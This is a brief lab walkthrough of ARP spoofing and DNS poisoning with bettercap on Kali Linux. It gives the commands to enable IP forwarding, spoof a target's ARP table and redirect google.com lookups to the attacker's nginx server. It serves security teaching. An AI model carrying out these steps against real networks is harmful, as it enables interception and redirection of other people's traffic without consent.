DNS Poisoning

Prepare Kali Box

• sudo apt udpate
• sudo apt install bettercap
• sudo apt install nginx
• sudo service nginx start
• go to localhost and see if a site is displayed.

Enable promiscuous mode

We need to ensure promiscuous mode is on for the interface we are using

• ifconfig eth0 promisc
• echo 1 > /proc/sys/net/ipv4/ip_forward

Attack

Get Ready

• log in to test machine to attack
• check IP and ARP -a before attack

Start and set up bettercap

• run arp - a before attack
• sudo bettercap
• set arp.spoof.targets [Target IP: 192.168.1.114]

• at this time ARP table content should have changed.
• check arp table

• set dns.spoof.domains google.com
• set dns.spoof.address [KALI Machine IP - 192.168.1.105]

Check results

• try to go to google.com from machine under attack